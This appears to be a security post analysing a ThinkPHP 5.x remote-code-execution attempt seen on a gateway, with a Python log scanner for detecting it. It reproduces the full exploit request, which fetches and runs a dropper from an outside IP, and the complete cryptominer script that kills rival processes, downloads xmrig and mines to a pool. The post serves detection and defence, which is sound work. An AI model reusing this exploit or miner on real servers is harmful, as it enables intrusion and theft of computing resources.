Suspected ThinkPHP RCE

Seen on someone's gateway.

index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=wget%20http://81.6.42.123/a_thk.sh%20-O%20/tmp/a;%20chmod%200777%20/tmp/a;%20/tmp/a;

This is the ThinkPHP 5.x route-dispatch RCE: the s= route resolves \think\app as the controller and invokefunction as the action, so the framework ends up calling call_user_func_array('shell_exec', [...]) with the attacker-supplied vars as arguments. The injected command fetches a dropper from 81.6.42.123, makes it executable and runs it. Controller-name validation that blocks this route shipped in ThinkPHP 5.0.23 and 5.1.31; anything older that exposes index.php is reachable with a single unauthenticated GET.
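As an added example (not from the original post), the following scanner walks web-server access logs for the invokefunction pattern above, decodes the query, and pulls out the PHP callback, the shell command and any stage-2 download URLs it carries (the same kind of URL the miner script below fetches from). The log lines, IPs and timestamps in SAMPLE_LOG are constructed; only the first line reproduces the payload seen on the gateway, and the matching of \think\Container as an alternative to \think\app is an assumption based on other known variants of the route.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample in combined log format (not real traffic). Only the first
# line reproduces the payload from the post; the others are benign or a variant.
SAMPLE_LOG = r"""
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=wget%20http://81.6.42.123/a_thk.sh%20-O%20/tmp/a;%20chmod%200777%20/tmp/a;%20/tmp/a; HTTP/1.1" 200 512 "-" "curl/7.64.0"
10.0.0.6 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php?s=/index/index/hello HTTP/1.1" 200 128 "-" "Mozilla/5.0"
10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /index.php?s=%2Findex%2F%5Cthink%5Capp%2Finvokefunction&function=call_user_func_array&vars%5B0%5D=system&vars%5B1%5D%5B%5D=id HTTP/1.1" 500 0 "-" "python-requests/2.25.1"
"""

# Route fragment that hands dispatch to \think\App::invokefunction. Matching
# \think\Container as well is an assumption covering the other common variant;
# case-insensitive because PHP class names are.
INVOKEFUNCTION = re.compile(r"\\think\\(?:app|container)/invokefunction", re.I)
REQUEST_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"'
)
URL = re.compile(r"""https?://[^\s;'"]+""")


def parse_query(query):
    """Split a raw query string on '&' only (never on ';', which is part of the
    injected shell command) and percent-decode keys and values."""
    params = {}
    for pair in query.split("&"):
        if not pair:
            continue
        key, _, value = pair.partition("=")
        params.setdefault(unquote_plus(key), []).append(unquote_plus(value))
    return params


def analyze_request(target):
    """Return a finding dict for a ThinkPHP invokefunction request, else None."""
    path, _, query = target.partition("?")
    params = parse_query(query)
    # The route normally travels in s=, but PATH_INFO-style routing puts it in the path.
    route = params.get("s", [unquote_plus(path)])[0]
    if not INVOKEFUNCTION.search(route):
        return None
    command = " ".join(params.get("vars[1][]", []))
    return {
        "route": route,
        "function": params.get("function", [""])[0],  # e.g. call_user_func_array
        "callback": params.get("vars[0]", [""])[0],   # e.g. shell_exec / system
        "command": command,                            # what the callback receives
        "urls": URL.findall(command),                  # stage-2 hosts to block/hunt
    }


def scan_log(text):
    """Return one finding per matching request line, tagged with client IP and time."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_LINE.match(line)
        if not m:
            continue
        finding = analyze_request(m.group("target"))
        if finding:
            finding["ip"] = m.group("ip")
            finding["ts"] = m.group("ts")
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} {f['callback']}({f['command']!r}) urls={f['urls']}")
```

Point scan_log at a real access log (it only needs the request line, so nginx and Apache combined formats both work) and feed the returned URLs into your egress blocklist; a 200 on the first line, as in the sample, means the request reached PHP and the download most likely happened, so the host also needs the /tmp/a and /tmp/xmrig_s checks.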

The mining script it pulls down is attached below:

# Runs forever: every two minutes it clears cron, kills competing miners,
# re-downloads xmrig if it went missing, and restarts it if it is not running.
while true;
do
    # Wipe the current user's crontab (removes rival miners' persistence).
    crontab -r;
    # Kill this user's processes, other than xmrig, whose cumulative CPU time
    # (TIME with ':' and '-' stripped and read as a number) is above 500,
    # i.e. roughly anything past 00:05:00: rival miners and other long-running jobs.
    ps -eo user,pid,time,comm | grep $("whoami") | grep -v 'xmrig' | awk 'BEGIN{ FS=":|-"; OFS=""; } { print $1,$2,$3,$4,$5,$6 }' | awk '$3>500' | awk '{print $2}' | xargs -r kill -9
    # Kill known competitor process names; the [e]/[g] bracket trick keeps grep from matching itself.
    ps x | grep 'networkservic[e]' | awk '{print $1}' | xargs -r kill -9
    ps x | grep 'sysupdat[e]' | awk '{print $1}' | xargs -r kill -9
    # Fetch the miner binary if it is absent or empty, with a second host as fallback.
    if [ ! -s "/tmp/xmrig_s" ]; then
        wget http://81.6.42.123/xmrig_s -O /tmp/xmrig_s; chmod +x /tmp/xmrig_s;
    fi
    if [ ! -s "/tmp/xmrig_s" ]; then
        wget http://82.72.134.224/xmrig_s -O /tmp/xmrig_s; chmod +x /tmp/xmrig_s;
    fi
    # Start the miner (backgrounded with -B) against the pool at 119.23.222.239:26590
    # unless at least two xmrig processes already exist.
    if [ "$(ps -eo comm | grep -c "xmri[g]")" -lt "2" ]; then
        /tmp/xmrig_s -r 1000 --donate-level 1 -o 119.23.222.239:26590 -B -p pass -k --max-cpu-usage=99 ;
    fi
    sleep 120;
done
